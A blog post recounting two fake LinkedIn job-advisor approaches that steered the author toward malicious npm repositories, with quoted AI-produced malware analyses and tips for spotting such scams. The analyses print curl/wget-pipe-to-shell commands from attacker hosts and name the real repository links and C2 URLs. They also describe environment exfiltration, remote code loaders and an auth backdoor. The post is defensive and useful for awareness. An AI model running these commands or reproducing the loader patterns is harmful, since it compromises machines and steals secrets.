Once or twice a month, I get a reach out to join as a technical advisor.
I got two in the last month, except both were fake and meant to install malware on my machine!

Both had a similar script. Someone reached out over LinkedIn to join their team as a technical advisor. Then they share a link to their code respository - without even asking me to sign an NDA or adding me to their org!
Then I was asked to try out the code where doing npm install alone would have triggered the malware. Here are the stories in detail.

First interview: reach out for a technical advisor

I got a reach out on LinkedIn by a European Software Engineer Johan Bulenes, to become a technical advisor for their web3 project. We spoke, and then he scheduled a meeting with the hiring manager, Steve Bullard.

The meeting was going fine for the first 5 minutes.
He showed some Figma mocks. Then he sent me a link to a repo https://github.com/LimitBreak-Hub/Bet-Pokler and asked me to clone it. I forked it in the GitHub UI, and he insisted that I should clone it on my laptop and share the screen. Further, he asked if I use VSCode, and that’s when it felt strange.

Then he asked me to do npm install and that’s where the siren went off. I said I won’t do it right away, and we have to reschedule the call.

Unsurprisingly, the repo was malicious. And it contains package download and installation if I ever open the project in VSCode. Here’s the Claude code analysis of the same.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

Verdict: This repository contains malicious code. Do NOT run npm install, npm start, or open this folder in VS Code.

  Four active attack vectors:

  1. VS Code auto-run on folder open — .vscode/tasks.json:47-69
  Task "env" with "runOn": "folderOpen", hidden behind whitespace padding and silent presentation, executes:
  - macOS: curl -L https://vscode-settings-0506.vercel.app/api/settings/mac | bash
  - Linux: wget -qO- .../linux | sh
  - Windows: curl … /windows | cmd

  Git history shows ~10 burner Vercel hosts rotated under the cover of "Update tasks.json" commits by GitWorkSpace2 <arfinapia832+3@gmail.com>.

  2. Server-side env exfiltration + remote-controlled RCE — server/routes/api/auth.js:18-36 and server/controllers/auth.js:67-72
  On every server start, validateApiKey():
  - atob(process.env.AUTH_API) → decodes to https://ip-core-api-one.vercel.app/api
  - POSTs the entire process.env (AWS, Stripe, JWT_SECRET, Mongo URI, etc.) to that URL
  - Pipes the HTTP response into new Function("require", response.data) and invokes it with full Node require — arbitrary remote code execution on your server.

  3. prepare npm lifecycle trigger — package.json:60
  "prepare": "node server/server.js" — npm install alone runs the server, triggering vector #2. You don't even need to start the app.

  4. Auth bypass backdoor — server/controllers/auth.js:39-44
  const isMatch = true; — password check is hard-wired; any known email logs in and gets a JWT.

  If you already opened the folder in VS Code or ran npm install on a host with real secrets:
  1. Rotate every secret that was in the shell/process environment.
  2. Check for persistence: cron, launchd, ~/.ssh/authorized_keys, shell rc files, ~/.config/*.
  3. Inspect shell history and recent processes; review what was pulled from the Vercel C2 hosts.
  4. Treat the entire repo as untrusted — reset to a known-good upstream rather than patching.

  The placeholder-looking secrets in .env (AKIAEXAMPLE12345, sk_test_*) are decoys — the malware exfiltrates the real runtime process.env, not the file.

  Want me to write up a cleaned diff that removes all four vectors, or just stop here?

Second interview: LinkedIn DMs to evaluate a project before becoming a technical advisor

Texas-based Russell Moronko reached out over LinkedIn to join his team as a technical advisor. He sent me a link to Google Doc. This sends me to another half-baked npm-based repo https://bitbucket.org/workspace860903/real_estate_platform_mvp_v1/src/main/. He insists that I try it out beforehand before coming for the meeting.

Is it malicious? yeah.

Here’s Claude’s analysis again

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

Verified independently. Yes — this repo contains a backdoor.

  Verdict: Malicious

  The payload: server/middlewares/validator/errorHandler.js
  - Lines 26-37: errorHandler takes a string and runs it with new (Function.constructor)('require', errCode) then calls it with require — arbitrary RCE with full Node access (filesystem, network, child_process).
  - Lines 49-63: errorTimeHandler base64-decodes a URL + secret header from env, fetches it, and on any error feeds the response body to errorHandler — so whatever the C2 returns gets executed.

  The trigger: server/middlewares/validator/index.js:105 — calls errorTimeHandler(); at module top-level, so it fires the moment the validator middleware is require()d (which productRoute.js → app.js does on server start).

  The C2: server/config/config.env.example lines 61-63 — base64 decodes to:
  - URL: https://server-victory5.vercel.app/api/ipcheck-encrypted/603_1
  - Header: x-secret-header: secret

  The "example" filename is camouflage — errorHandler.js:3 explicitly loads config.env.example via dotenv.config(...), so the values are live even without a real .env.

  Other signals
  - The repo claims to be a real-estate MVP but the server code is an unrelated "RoyalCity" e-commerce scaffold — cover content.
  - dbErrorHandler.js is single-line minified (suspicious in an otherwise readable codebase, though its content is benign).
  - Frontend (React/Vite, public/service-worker.js, etc.) is clean.

  Recommendation

  Do not run npm install or start the server. If you already did:
  1. Stop any running node process from this repo.
  2. Check outbound connections to server-victory5.vercel.app and any unexpected child processes.
  3. Rotate any credentials that were present in the environment when it ran.
  4. Treat node_modules as untrusted and delete it — the loader could have pulled and persisted anything.

  Want me to write up the specific lines to remove, or leave the repo as-is for forensic purposes?

Note that, before publishing the blog post, I reached out to both individuals over the LinkedIn DMs to see if there was an explanation to this. Unsurprisingly, both of them promptly blocked me.

I have read about North Korea based scammers who using the same social engineering to steal USD 285M from Drift DeFi protocol.

I never thought that two scammers would try to me with a similar scam the very next month.

Here’s how to spot such scams

If you get a similar reach out, here’s an easy way to spot such scams

  1. No one puts out their code repository publicly unless it is meant to be open-source.
  2. If it is open-source, you will see a meaningful activity - stars, forks, contributors.
  3. No one shares their private code repository without an NDA. Now, as signing an NDA is slow, the scam becomes slow, involved, and difficult to execute.
  4. Never do npm install on your personal machine till the second conversation
  5. If you have to do npm install rent a VM on the cloud
  6. If you really want to run such code inside a sandbox - both attacks would have failed in my case because I always run npm inside sandbox, but still, it is better to catch the social engineering tactics first